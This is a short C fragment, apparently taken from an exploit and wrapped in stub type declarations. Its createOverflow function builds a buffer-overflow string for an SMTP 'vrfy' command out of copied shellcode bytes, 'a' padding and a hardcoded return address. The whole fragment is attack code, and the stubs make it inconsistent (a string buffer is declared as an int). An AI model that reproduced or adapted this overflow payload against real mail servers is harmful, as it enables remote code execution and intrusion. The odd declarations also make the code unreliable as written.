
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int printf (char*) ;
 int s ;
 unsigned int size ;
 unsigned long start ;
 int strcat (int ,...) ;
 int strcpy (int ,char*) ;
 unsigned int strlen (unsigned char*) ;

void createOverflow(void)
 {
         unsigned char payload[236];
         unsigned char fillout[236];
         unsigned char ret[5];
         unsigned int i;
         unsigned long temp;
         unsigned char *p;


         temp = start;
         for (i=0; i<size; i++) {
                 p = (unsigned char*) temp;
                 payload[i] = *p;
                 temp++;
         }
         payload[i] = '\0';


         i = strlen(payload);
         while (i<235) {
                 fillout[i-strlen(payload)] = 'a';
                 i++;
         }
         fillout[i-strlen(payload)] = '\0';


         ret[0] = 0x45;
         ret[1] = 0xF4;
         ret[2] = 0xF1;
         ret[3] = 0x01;
         ret[4] = 0x00;

         strcpy(s, "vrfy xxxxx");
         strcat(s, payload);
         strcat(s, fillout);
         strcat(s, ret);
         strcat(s, "\r\n");
         printf("Created overflow string.\n");
 }
